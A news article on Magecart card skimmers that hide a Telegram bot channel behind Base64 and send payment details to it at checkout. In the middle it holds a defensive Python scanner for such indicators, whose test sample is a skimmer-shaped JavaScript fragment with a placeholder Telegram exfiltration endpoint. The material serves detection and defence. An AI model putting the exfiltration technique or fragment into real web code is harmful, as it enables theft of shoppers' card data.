Security researchers noticed a new twist in the tactics used by cybercriminals affiliated with Magecart operations - cyberattacks aimed at stealing credit-card data from online shoppers. Hackers are now using the encrypted messaging service Telegram as a channel for sending stolen credit-card information back to their command-and-control (C2) servers.
As the researcher noted, while this method is effective for data exfiltration, it is not a very reliable technique, since anyone who obtains the token for the Telegram bot can hijack the process.
“Telegram isn't set up to do this type of thing properly, you have to grant publicly accessible code too much power. And, like many other digital skimming/#magecart techniques, this can be preemptively defeated via a Content Security Policy,” the researcher said in a tweet.
According to Jérôme Segura of Malwarebytes, who has also analyzed the skimmer code, the skimmer's author hid the bot ID and channel, as well as the Telegram API request, behind simple Base64 encoding.
“The exfiltration is triggered only if the browser’s current URL contains a keyword indicative of a shopping site and when the user validates the purchase. At this point, the browser will send the payment details to both the legitimate payment processor and the cybercriminals,” Segura explained.
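The Base64 wrapping Segura describes is thin obfuscation, which a defender reviewing a checkout page's scripts can peel back. The following Python scanner is an added example, not code from the article, Malwarebytes or the skimmer: it decodes every Base64-looking run in a script and flags those that resolve to Telegram bot API references. The sample script, its bot token and its chat ID are constructed placeholders.

```python
import base64
import re

# Substrings that identify the exfiltration channel described in the article.
TELEGRAM_MARKERS = ("api.telegram.org", "/sendMessage", "/bot")

# Candidate Base64 runs: 16+ alphabet characters, optional padding.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_candidates(js_text):
    """Return (blob, decoded_text) for each run that is valid Base64 and decodes to printable UTF-8."""
    found = []
    for match in B64_RE.finditer(js_text):
        blob = match.group(0)
        try:
            # Repair missing padding, reject anything that is not strict Base64.
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
            text = raw.decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # identifiers and random tokens fall out here
        if text.isprintable():
            found.append((blob, text))
    return found


def find_telegram_exfil(js_text):
    """Decoded strings that reference the Telegram bot API, in order of appearance."""
    return [
        text
        for _blob, text in decode_candidates(js_text)
        if any(marker in text for marker in TELEGRAM_MARKERS)
    ]


def _b64(s):
    return base64.b64encode(s.encode()).decode()


# Constructed sample in the shape the article describes: Base64-wrapped API
# endpoint and channel, and a URL keyword check before exfiltration.
# "000000:PLACEHOLDER_TOKEN" and "-1000000000000" are placeholders, not real values.
SAMPLE_JS = (
    'var api = atob("' + _b64("https://api.telegram.org/bot000000:PLACEHOLDER_TOKEN/sendMessage") + '");\n'
    'var chat = atob("' + _b64("-1000000000000") + '");\n'
    'if (/checkout|payment|onepage/.test(location.href)) { send(api, chat); }\n'
)

if __name__ == "__main__":
    for hit in find_telegram_exfil(SAMPLE_JS):
        print("Telegram exfiltration indicator:", hit)
```

Pair this with a Content Security Policy whose connect-src omits api.telegram.org, as the tweet above suggests, so that a skimmer the scanner misses still cannot deliver its payload.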
This data exfiltration mechanism, the researcher noted, is efficient and doesn’t require cybercriminals to keep up infrastructure that could be taken down or blocked by defenders.
“They can even receive a notification in real time for each new victim, helping them quickly monetize the stolen cards in underground markets,” he added.